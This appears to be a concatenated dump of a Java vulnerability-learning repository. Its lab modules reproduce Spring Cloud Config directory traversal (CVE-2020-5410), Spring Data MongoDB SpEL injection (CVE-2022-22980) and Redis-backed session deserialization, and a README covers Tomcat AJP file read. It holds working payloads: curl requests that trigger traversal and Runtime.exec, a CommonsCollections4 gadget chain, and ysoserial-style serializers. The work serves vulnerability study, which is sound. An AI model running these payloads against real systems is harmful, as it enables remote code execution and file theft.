| package com.threedr3am.bug.spring.config.server; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | import org.springframework.cloud.config.server.EnableConfigServer; 6 | 7 | /** 8 | * @author threedr3am 9 | */ 10 | @EnableConfigServer 11 | @SpringBootApplication 12 | public class Application { 13 | 14 | public static void main(String[] args) { 15 | SpringApplication.run(Application.class, args); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /spring/spring-cloud-config-server-CVE-2020-5410/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java: 
--------------------------------------------------------------------------------
/**
 * CVE-2020-5410: directory traversal in Spring Cloud Config Server (2.2.2.RELEASE per this
 * module's pom).
 *
 * Trigger point:
 * org.springframework.cloud.config.server.environment.EnvironmentController#getEnvironment(java.lang.String, java.lang.String, java.lang.String, boolean)
 *
 * Reproduce:
 *   echo "threedr3am" > /tmp/fake-news.txt
 *   curl http://127.0.0.1:9988/fake-news.txt%23/bbbbb/..%28_%29..%28_%29..
 *
 * Core of the technique: the URL-encoded '#' (%23) comments out the configuration-file suffix
 * that Spring Boot appends automatically, so the requested name resolves to the raw file.
 * NOTE(review): the "%28_%29" pieces, i.e. "(_)", are presumably what EnvironmentController
 * rewrites into path separators to form "../../.." -- verify against the controller source.
 *
 * TODO limitations:
 * 1. Only parent directories are reachable: with the native directory at /tmp/aaa/bbb, the
 *    traversal can only land in /tmp/aaa, /tmp or /.
 * 2. The target file must have a file extension.
 *
 * @author threedr3am
 */
package com.threedr3am.bug.spring.config.server; --------------------------------------------------------------------------------
/spring/spring-cloud-config-server-CVE-2020-5410/src/main/resources/application.yml: --------------------------------------------------------------------------------
spring:
  profiles:
    active: native
  cloud:
    config:
      server:
        native:
          # Lab setup for CVE-2020-5410: the {label}/{application}/{profiles} placeholders are
          # substituted from the request path, which is what the traversal above relies on.
          search-locations: file:///tmp/aaa/bbb{label},file:///tmp/aaa/bbb{application},file:///tmp/aaa/bbb{profiles}
server:
  port: 9988
--------------------------------------------------------------------------------
/spring/spring-data-mongodb-spel-CVE-2022-22980/README.md: -------------------------------------------------------------------------------- 1 | ## CVE-2022-22980: Spring Data MongoDB SpEL Expression injection vulnerability through annotated repository query methods 2 | 3 | ### 1. Run Java Server(not need MongoDB Server) 4 | ``` 5 | com.threedr3am.bug.spring.data.mongodb.Application.main 6 | ``` 7 | 8 | ### 2.
payload 9 | ``` 10 | curl --location --request POST 'http://127.0.0.1:8080/demo' \ 11 | --header 'Content-Type: application/x-www-form-urlencoded' \ 12 | --data-urlencode 'keyword=T(java.lang.String).forName('\''java.lang.Runtime'\'').getRuntime().exec('\''/System/Applications/Calculator.app/Contents/MacOS/Calculator'\'')' 13 | ``` 14 | 15 | 16 | -------------------------------------------------------------------------------- /spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.6.8 9 | 10 | 11 | 4.0.0 12 | 13 | spring-data-mongodb-spel-CVE-2022-22980 14 | 15 | 16 | 8 17 | 8 18 | 19 | 20 | 21 | 22 | org.springframework.boot 23 | spring-boot-starter-web 24 | 25 | 26 | 27 | 28 | 29 | 30 | org.springframework.boot 31 | spring-boot-starter-data-mongodb 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/Application.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.spring.data.mongodb; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | /** 7 | * @author threedr3am 8 | */ 9 | @SpringBootApplication 10 | public class Application { 11 | 12 | public static void main(String[] args) { 13 | SpringApplication.run(Application.class, args); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/controller/DemoController.java: -------------------------------------------------------------------------------- 1 | package 
com.threedr3am.bug.spring.data.mongodb.controller; 2 | 3 | import com.threedr3am.bug.spring.data.mongodb.repository.DemoRepository; 4 | import java.util.List; 5 | import org.springframework.web.bind.annotation.RequestMapping; 6 | import org.springframework.web.bind.annotation.RequestParam; 7 | import org.springframework.web.bind.annotation.RestController; 8 | 9 | @RestController 10 | public class DemoController { 11 | 12 | private final DemoRepository demoRepository; 13 | 14 | public DemoController(DemoRepository demoRepository) { 15 | this.demoRepository = demoRepository; 16 | } 17 | 18 | @RequestMapping(value = "/demo") 19 | public List demo(@RequestParam(name = "keyword") String keyword) { 20 | return demoRepository.findAllByIdLike(keyword); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/entity/Demo.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.spring.data.mongodb.entity; 2 | 3 | import org.springframework.data.mongodb.core.mapping.MongoId; 4 | 5 | public class Demo { 6 | 7 | @MongoId 8 | private String id; 9 | } 10 | -------------------------------------------------------------------------------- /spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.spring.data.mongodb.repository; 2 | 3 | import com.threedr3am.bug.spring.data.mongodb.entity.Demo; 4 | import java.util.List; 5 | import org.springframework.data.mongodb.repository.Query; 6 | import org.springframework.data.repository.Repository; 7 | 8 | @org.springframework.stereotype.Repository 9 | public interface DemoRepository extends Repository { 10 | 11 | @Query("{ id : :#{?0} }") 12 | List 
findAllByIdLike(String keyword); 13 | 14 | @Query("{ id : ?#{?0} }") 15 | List findAllByIdLike2(String keyword); 16 | } 17 | -------------------------------------------------------------------------------- /spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/resources/application.yml: -------------------------------------------------------------------------------- 1 | #spring: 2 | # data: 3 | # mongodb: 4 | # host: 127.0.0.1 5 | # port: 27017 6 | # database: test 7 | # username: admin 8 | # password: 123456 -------------------------------------------------------------------------------- /spring/spring-session-redis-sync/1/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | spring-session-redis-sync 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | 1 13 | 14 | 15 | 16 | org.springframework.boot 17 | spring-boot-starter-web 18 | 2.3.0.RELEASE 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /spring/spring-session-redis-sync/1/src/main/java/me/threedr3am/bug/spring/redis/session/Application.java: -------------------------------------------------------------------------------- 1 | package me.threedr3am.bug.spring.redis.session; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | /** 7 | * @author threedr3am 8 | */ 9 | @SpringBootApplication 10 | public class Application { 11 | 12 | public static void main(String[] args) { 13 | SpringApplication.run(Application.class, args); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /spring/spring-session-redis-sync/1/src/main/java/me/threedr3am/bug/spring/redis/session/config/SpringHttpSessionConfig.java: -------------------------------------------------------------------------------- 1 | package me.threedr3am.bug.spring.redis.session.config; 2 | 3 | import 
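org.springframework.context.annotation.Configuration;
import org.springframework.session.data.redis.config.annotation.web.http.EnableRedisHttpSession;

/**
 * Enables Redis-backed HTTP sessions under the "threedr3am-session" namespace with a two-hour
 * inactivity timeout. Session values go through the default JDK serializer (see this module's
 * README), which is the deserialization exposure the module demonstrates.
 *
 * @author threedr3am
 */
@Configuration
@EnableRedisHttpSession(redisNamespace = "threedr3am-session", maxInactiveIntervalInSeconds = 2 * 60 * 60)
public class SpringHttpSessionConfig {

}
--------------------------------------------------------------------------------
/spring/spring-session-redis-sync/1/src/main/java/me/threedr3am/bug/spring/redis/session/controller/TestController.java: --------------------------------------------------------------------------------
package me.threedr3am.bug.spring.redis.session.controller;

import javax.servlet.http.HttpSession;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

/**
 * Minimal endpoint to observe session replication: GET /cache?data=... stores the value in the
 * session, GET /cache with no parameter echoes whatever the (Redis-backed) session holds.
 *
 * @author threedr3am
 */
@RestController
public class TestController {

  @GetMapping("/cache")
  public String cacheData(@RequestParam(name = "data", required = false) String data, HttpSession httpSession) {
    if (data == null) {
      // String.valueOf renders a missing attribute as "null" instead of throwing.
      return String.valueOf(httpSession.getAttribute("data"));
    } else {
      httpSession.setAttribute("data", data);
      return data;
    }
  }
}
--------------------------------------------------------------------------------
/spring/spring-session-redis-sync/1/src/main/resources/application.yml: --------------------------------------------------------------------------------
server:
  port: 30001

spring:
  # Fixed: the key was misspelled "reids", so Spring Boot silently ignored this whole block; the
  # demo only worked because the defaults (localhost:6379, no password) happen to match.
  redis:
    host: 127.0.0.1
    port: 6379
    password:
--------------------------------------------------------------------------------
/spring/spring-session-redis-sync/2/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 |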
spring-session-redis-sync 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | 2 13 | 14 | 15 | 16 | org.springframework.boot 17 | spring-boot-starter-web 18 | 2.3.0.RELEASE 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /spring/spring-session-redis-sync/2/src/main/java/me/threedr3am/bug/spring/redis/session/Application.java: -------------------------------------------------------------------------------- 1 | package me.threedr3am.bug.spring.redis.session; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | /** 7 | * @author threedr3am 8 | */ 9 | @SpringBootApplication 10 | public class Application { 11 | 12 | public static void main(String[] args) { 13 | SpringApplication.run(Application.class, args); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /spring/spring-session-redis-sync/2/src/main/java/me/threedr3am/bug/spring/redis/session/config/SpringHttpSessionConfig.java: -------------------------------------------------------------------------------- 1 | package me.threedr3am.bug.spring.redis.session.config; 2 | 3 | import org.springframework.context.annotation.Configuration; 4 | import org.springframework.session.data.redis.config.annotation.web.http.EnableRedisHttpSession; 5 | 6 | /** 7 | * @author threedr3am 8 | */ 9 | @Configuration 10 | @EnableRedisHttpSession(redisNamespace = "threedr3am-session", maxInactiveIntervalInSeconds = 2 * 60 * 60) 11 | public class SpringHttpSessionConfig { 12 | 13 | } 14 | -------------------------------------------------------------------------------- /spring/spring-session-redis-sync/2/src/main/java/me/threedr3am/bug/spring/redis/session/controller/TestController.java: -------------------------------------------------------------------------------- 1 | package me.threedr3am.bug.spring.redis.session.controller; 2 | 3 | import 
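javax.servlet.http.HttpSession;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

/**
 * Second cluster node of the session-replication demo: GET /cache?data=... stores the value in
 * the session, GET /cache with no parameter echoes whatever the (Redis-backed) session holds --
 * including a value written by node 1.
 *
 * @author threedr3am
 */
@RestController
public class TestController {

  @GetMapping("/cache")
  public String cacheData(@RequestParam(name = "data", required = false) String data, HttpSession httpSession) {
    if (data == null) {
      // String.valueOf renders a missing attribute as "null" instead of throwing.
      return String.valueOf(httpSession.getAttribute("data"));
    } else {
      httpSession.setAttribute("data", data);
      return data;
    }
  }
}
--------------------------------------------------------------------------------
/spring/spring-session-redis-sync/2/src/main/resources/application.yml: --------------------------------------------------------------------------------
server:
  port: 30002

spring:
  # Fixed: the key was misspelled "reids", so Spring Boot silently ignored this whole block; the
  # demo only worked because the defaults (localhost:6379, no password) happen to match.
  redis:
    host: 127.0.0.1
    port: 6379
    password:
--------------------------------------------------------------------------------
/spring/spring-session-redis-sync/README.md: -------------------------------------------------------------------------------- 1 | ### spring-boot session同步最佳实践脚手架spring-session-data-redis的安全隐患问题 2 | 3 | *一年前半前在某互联网医疗企业写过一个项目,当时项目中对接了微信的OAuth,为了性能考虑,不惜破坏了OAuth的规范,对其使用了session, 4 | 但因为系统部署是集群模式的,在A机器上做好OAuth认证初始化的session,在B机器上是不存在的,导致在做了负载均衡访问的集群环境中, 5 | 需要做多次重复冗余的OAuth认证,最终为了性能考虑,做了一番调研,选择了开源社区中比较成熟,受众比较多的spring-session-data-redis.* 6 | 7 | *最近看了下spring-session-data-redis的源码发现,其默认使用了JDK的原生序列化方式对session值进行了序列化,然后缓存到redis中, 8 | 集群中的每一台机器,在用户访问后,将会从redis中取出缓存的数据,并反序列化回session,这个过程存在很大的安全隐患,恶意用户利用 9 | redis未授权访问或弱口令等缺陷,取得对其读写的权力,然后对其写入恶意序列化数据,在集群机器对其数据进行反序列化时,将会执行恶意代码。* 10 | 11 | *很明显,spring-session-data-redis不在意其反序列化安全问题,认为其安全问题都是由于redis的未授权访问或弱口令等缺陷导致的。* 12 | 13 | 1. run server-1 & server-2 14 | 2. GET http://127.0.0.1:30001/cache?data=threedr3am 15 | 3.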
GET http://127.0.0.1:30002/cache 16 | 17 | 上述步骤后可以看到session数据已经同步成功 18 | 19 | 4. run me.threedr3am.bug.spring.redis.session.Main 20 | 5. 把得到的十六进制序列化数据通过redis客户端,设置到redis存储的session value 21 | 6. GET http://127.0.0.1:30002/cache 22 | 23 | 这个时候就触发了反序列化,计算器弹出来了! -------------------------------------------------------------------------------- /spring/spring-session-redis-sync/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | spring 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | spring-session-redis-sync 13 | pom 14 | 15 | 1 16 | 2 17 | 18 | 19 | 20 | 21 | org.springframework.session 22 | spring-session-data-redis 23 | 2.3.0.RELEASE 24 | 25 | 26 | org.springframework.boot 27 | spring-boot-starter-data-redis 28 | 2.3.0.RELEASE 29 | 30 | 31 | 32 | org.apache.commons 33 | commons-collections4 34 | 4.0 35 | 36 | 37 | org.javassist 38 | javassist 39 | 3.25.0-GA 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /spring/spring-session-redis-sync/src/main/java/me/threedr3am/bug/spring/redis/session/CommonCollections4.java: -------------------------------------------------------------------------------- 1 | package me.threedr3am.bug.spring.redis.session; 2 | 3 | import me.threedr3am.bug.spring.redis.session.utils.Gadgets; 4 | import me.threedr3am.bug.spring.redis.session.utils.Reflections; 5 | import org.apache.commons.collections4.bag.TreeBag; 6 | import org.apache.commons.collections4.comparators.TransformingComparator; 7 | import org.apache.commons.collections4.functors.InvokerTransformer; 8 | 9 | /** 10 | * @author threedr3am 11 | */ 12 | public class CommonCollections4 { 13 | 14 | public static Object getPayload() throws Exception { 15 | Object templates = Gadgets.createTemplatesImpl("/System/Applications/Calculator.app/Contents/MacOS/Calculator"); 16 | 17 | // setup harmless chain 18 | final InvokerTransformer transformer = new InvokerTransformer("toString", new 
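Class[0], new Object[0]); 19 | 20 | // define the comparator used for sorting 21 | TransformingComparator comp = new TransformingComparator(transformer); 22 | 23 | // prepare CommonsCollections object entry point 24 | TreeBag tree = new TreeBag(comp); 25 | tree.add(templates); 26 | 27 | // arm transformer 28 | Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); 29 | 30 | return tree; 31 | } 32 | 33 | } 34 | --------------------------------------------------------------------------------
/spring/spring-session-redis-sync/src/main/java/me/threedr3am/bug/spring/redis/session/Main.java: --------------------------------------------------------------------------------
package me.threedr3am.bug.spring.redis.session;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;

/**
 * Prints the Java-serialized CommonsCollections4 gadget as a redis-cli style "\xHH" escape string,
 * ready to be written over the spring-session value stored in Redis (README step 5). Anyone who
 * can write that key gets code execution on every node that deserializes it -- which is the point
 * of the demo, and why Redis holding JDK-serialized sessions must not be reachable by untrusted
 * parties.
 *
 * @author threedr3am
 */
public class Main {

  public static void main(String[] args) throws Exception {
    Object payload = CommonCollections4.getPayload();
    System.out.println(toHexEscapes(serialize(payload)));
  }

  /**
   * Java-serializes {@code obj}. The original never flushed or closed the ObjectOutputStream;
   * try-with-resources makes the flush explicit instead of relying on writeObject's internal
   * buffer drain.
   */
  static byte[] serialize(Object obj) throws IOException {
    ByteArrayOutputStream buffer = new ByteArrayOutputStream();
    try (ObjectOutputStream out = new ObjectOutputStream(buffer)) {
      out.writeObject(obj);
    }
    return buffer.toByteArray();
  }

  /** Renders every byte as "\xHH" (two uppercase hex digits), the escape form redis-cli accepts. */
  static String toHexEscapes(byte[] bytes) {
    StringBuilder sb = new StringBuilder(bytes.length * 4);
    for (byte b : bytes) {
      sb.append(String.format("\\x%02X", b));
    }
    return sb.toString();
  }

  // e.g. a serialized String "threedr3am" prints (redis-cli display form) as:
  // \xAC\xED\x00\x05t\x00\x0Athreedr3am
}
--------------------------------------------------------------------------------
/spring/spring-uricomponentsbuilder-2/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.7.18 9 | 10 | 11 | 4.0.0 12 | 13 | spring-uricomponentsbuilder-2 14 | 15 | 16 | 8 17 | 8 18 | 19 | 20 | 21 | 22 | org.springframework.boot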
23 | spring-boot-starter-web 24 | 25 | 26 | 27 | org.springframework 28 | spring-web 29 | 5.3.32 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.spring.uricomponentsbuilder; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | /** 7 | * @author threedr3am 8 | */ 9 | @SpringBootApplication 10 | public class Main { 11 | 12 | public static void main(String[] args) { 13 | SpringApplication.run(Main.class, args); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /spring/spring-uricomponentsbuilder/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.7.18 9 | 10 | 11 | 4.0.0 12 | 13 | spring-uricomponentsbuilder 14 | 15 | 16 | 8 17 | 8 18 | 19 | 20 | 21 | 22 | org.springframework.boot 23 | spring-boot-starter-web 24 | 25 | 26 | 27 | org.springframework 28 | spring-web 29 | 5.3.31 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.spring.uricomponentsbuilder; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | /** 7 | * @author threedr3am 8 | */ 9 | @SpringBootApplication 10 | public class Main { 11 | 12 | public static void main(String[] args) { 13 | SpringApplication.run(Main.class, args); 14 | } 15 | 
} 16 | -------------------------------------------------------------------------------- /tomcat/ajp-bug/README.md: -------------------------------------------------------------------------------- 1 | 任意文件读取 2 | 3 | java -jar ajp-bug-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 8009 file /index.jsp 4 | 5 | 文件包含 6 | 7 | java -jar ajp-bug-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 8009 jsp /index.jsp 8 | 9 | 打包方式: 10 | 11 | 在目录tomcat/ajp-bug 12 | 执行 mvn clean compile assembly:assembly -------------------------------------------------------------------------------- /tomcat/ajp-bug/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | tomcat 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | ajp-bug 13 | 14 | 15 | 16 | 17 | 18 | org.apache.maven.plugins 19 | maven-assembly-plugin 20 | 21 | 22 | 23 | com.threedr3am.bug.tomcat.ajp.FileRead 24 | 25 | 26 | 27 | jar-with-dependencies 28 | 29 | false 30 | 31 | 32 | 33 | make-assembly 34 | package 35 | 36 | single 37 | 38 | 39 | 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /tomcat/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | learn-java-bug 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | tomcat 13 | pom 14 | 15 | ajp-bug 16 | sync-session-bug 17 | session-filestore 18 | 19 | 20 | 21 | 22 | org.apache.tomcat 23 | tomcat-coyote 24 | 7.0.39 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /tomcat/session-filestore/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | tomcat 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | session-filestore 13 | 14 | 15 | -------------------------------------------------------------------------------- /tomcat/sync-session-bug/pom.xml: 
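-------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | tomcat 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | sync-session-bug 13 | 14 | 15 | 16 | javassist 17 | javassist 18 | 3.12.0.GA 19 | compile 20 | 21 | 22 | 23 | --------------------------------------------------------------------------------
/tomcat/sync-session-bug/src/main/java/com/threedr3am/bug/tomcat/sync/session/payload/Payload.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.tomcat.sync.session.payload;

/**
 * Factory for the object graph that is later passed to Java serialization
 * (see {@code utils.Serializer} / {@code utils.Converter} in this module).
 *
 * @author threedr3am
 */
public interface Payload {

    /**
     * Builds the object to serialize.
     *
     * @param command implementation-specific arguments; their meaning is defined by the
     *                implementing class, which is outside this file
     * @return the object graph to serialize
     * @throws Exception if the graph cannot be constructed
     */
    Object getObject(String... command) throws Exception;
}
--------------------------------------------------------------------------------
/tomcat/sync-session-bug/src/main/java/com/threedr3am/bug/tomcat/sync/session/payload/Payloads.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.tomcat.sync.session.payload;

/**
 * Registry of the available {@link Payload} implementations, addressable by name.
 *
 * @author threedr3am
 */
public enum Payloads {
    URLDNS(URLDNS.class),
    Jdk7u21(Jdk7u21.class),
    Jdk8u20(Jdk8u20.class),
    ;

    // implementation class behind this entry; never reassigned after construction
    private final Class<?> clazz;

    Payloads(Class<?> clazz) {
        this.clazz = clazz;
    }

    /**
     * @return the implementation class registered for this entry
     */
    public Class<?> getClazz() {
        return clazz;
    }
}
--------------------------------------------------------------------------------
/tomcat/sync-session-bug/src/main/java/com/threedr3am/bug/tomcat/sync/session/support/ClusterMessage.java:
--------------------------------------------------------------------------------
/*
 * Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements.  See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.
 * The ASF licenses this file to You under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with
 * the License.  You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package com.threedr3am.bug.tomcat.sync.session.support;

import java.io.Serializable;

/**
 * Contract for a cluster message: a sender address, a unique id and a timestamp.
 * NOTE(review): the ASF header and the method set suggest this is a local copy of
 * Tomcat's {@code org.apache.catalina.ha.ClusterMessage}, presumably kept so the
 * serialized form matches what a Tomcat cluster expects - confirm against the Tomcat
 * version pinned in the parent pom (tomcat-coyote 7.0.39).
 */
public interface ClusterMessage extends Serializable {
    Member getAddress();
    void setAddress(Member member);
    String getUniqueId();
    long getTimestamp();
    void setTimestamp(long timestamp);
}
--------------------------------------------------------------------------------
/tomcat/sync-session-bug/src/main/java/com/threedr3am/bug/tomcat/sync/session/utils/ClassFiles.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.tomcat.sync.session.utils;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;

/**
 * Locates a class's {@code .class} resource on the classpath and reads its bytes.
 *
 * code from ysoserial
 */
public class ClassFiles {

    /**
     * Returns the classpath resource name of {@code clazz} including the {@code .class}
     * suffix, e.g. {@code com/example/Outer$Inner.class}.
     */
    public static String classAsFile(final Class clazz) {
        return classAsFile(clazz, true);
    }

    /**
     * Returns the classpath resource name of {@code clazz}.
     *
     * @param clazz  the class to locate
     * @param suffix whether to append {@code .class}
     * @return the resource path; a nested class is rendered as {@code Outer$Inner} by
     *         recursing on the enclosing class without the suffix
     */
    public static String classAsFile(final Class clazz, boolean suffix) {
        String path;
        if (clazz.getEnclosingClass() == null) {
            path = clazz.getName().replace(".", "/");
        } else {
            path = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName();
        }
        return suffix ? path + ".class" : path;
    }

    /**
     * Reads the bytecode of {@code clazz} through the class loader that loaded this helper.
     *
     * @throws RuntimeException wrapping the {@link IOException} when the resource is
     *                          missing or cannot be read
     */
    public static byte[] classAsBytes(final Class clazz) {
        final String file = classAsFile(clazz);
        InputStream in = null;
        try {
            in = ClassFiles.class.getClassLoader().getResourceAsStream(file);
            if (in == null) {
                throw new IOException("couldn't find '" + file + "'");
            }
            final ByteArrayOutputStream out = new ByteArrayOutputStream();
            final byte[] buffer = new byte[1024];
            int len;
            while ((len = in.read(buffer)) != -1) {
                out.write(buffer, 0, len);
            }
            return out.toByteArray();
        } catch (IOException e) {
            throw new RuntimeException(e);
        } finally {
            // the original never closed the resource stream; close it on every path
            if (in != null) {
                try {
                    in.close();
                } catch (IOException ignored) {
                    // best-effort close: the bytes (or the real error) are already decided above
                }
            }
        }
    }

}
--------------------------------------------------------------------------------
/tomcat/sync-session-bug/src/main/java/com/threedr3am/bug/tomcat/sync/session/utils/Converter.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.tomcat.sync.session.utils;

import java.io.ByteArrayOutputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;

/**
 * Writes a mixed sequence of boxed primitives, strings and arbitrary objects as one
 * byte stream.
 *
 * code from ysoserial
 */
public class Converter {

    /**
     * Encodes every element of {@code objs} with {@link #treatObject} and returns the
     * concatenated bytes.
     *
     * @throws IOException if any element fails to serialize
     */
    public static byte[] toBytes(Object[] objs) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        DataOutputStream dos = new DataOutputStream(baos);
        try {
            for (Object obj : objs) {
                treatObject(dos, obj);
            }
        } finally {
            dos.close();
        }
        return baos.toByteArray();
    }

    /**
     * Writes a single value: {@code Byte}/{@code Short}/{@code Integer}/{@code Long} as the
     * matching fixed-width big-endian primitive, {@code String} as modified UTF-8
     * ({@link DataOutputStream#writeUTF}), anything else via Java serialization with the
     * 4-byte stream header (magic {@code 0xACED} + version {@code 0x0005}) dropped.
     */
    public static void treatObject(DataOutputStream dos, Object obj)
        throws IOException {
        if (obj instanceof Byte) {
            dos.writeByte((Byte) obj);
        } else if (obj instanceof Short) {
            dos.writeShort((Short) obj);
        } else if (obj instanceof Integer) {
            dos.writeInt((Integer) obj);
        } else if (obj instanceof Long) {
            dos.writeLong((Long) obj);
        } else if (obj instanceof String) {
            dos.writeUTF((String) obj);
        } else {
            ByteArrayOutputStream ba = new ByteArrayOutputStream();
            ObjectOutputStream oos = new ObjectOutputStream(ba);
            try {
                oos.writeObject(obj);
            } finally {
                oos.close();
            }
            dos.write(ba.toByteArray(), 4, ba.size() - 4); // 4 = skip the header
        }
    }
}
--------------------------------------------------------------------------------
/tomcat/sync-session-bug/src/main/java/com/threedr3am/bug/tomcat/sync/session/utils/Serializer.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.tomcat.sync.session.utils;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.util.concurrent.Callable;

/**
 * Java-serializes an object, either eagerly via the static helpers or lazily as a
 * {@link Callable}. The output is plain {@link ObjectOutputStream} format; anything that
 * later reads such bytes from an untrusted source should do so behind an
 * {@code ObjectInputFilter} (or not at all).
 */
public class Serializer implements Callable<byte[]> {

    private final Object object;

    public Serializer(Object object) {
        this.object = object;
    }

    /**
     * @return {@link #serialize(Object)} applied to the wrapped object
     */
    public byte[] call() throws Exception {
        return serialize(object);
    }

    /**
     * Serializes {@code obj} into a fresh byte array.
     */
    public static byte[] serialize(final Object obj) throws IOException {
        final ByteArrayOutputStream out = new ByteArrayOutputStream();
        serialize(obj, out);
        return out.toByteArray();
    }

    /**
     * Serializes {@code obj} onto {@code out} and flushes, so a buffered or socket stream
     * sees the complete record. The stream is deliberately not closed: it belongs to the
     * caller.
     */
    public static void serialize(final Object obj, final OutputStream out) throws IOException {
        final ObjectOutputStream objOut = new ObjectOutputStream(out);
        objOut.writeObject(obj);
        objOut.flush();
    }

}
-------------------------------------------------------------------------------- /xxe/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | learn-java-bug 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | xxe 13 | 14 | 15 | 16 | com.xyh 17 | common 18 | 1.0-SNAPSHOT 19 | 20 | 21 | 22 | org.dom4j 23 | dom4j 24 | 2.0.0 25 | 26 | 27 | 28 | org.jdom 29 | jdom 30 | 1.1.3 31 | 32 | 33 | --------------------------------------------------------------------------------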
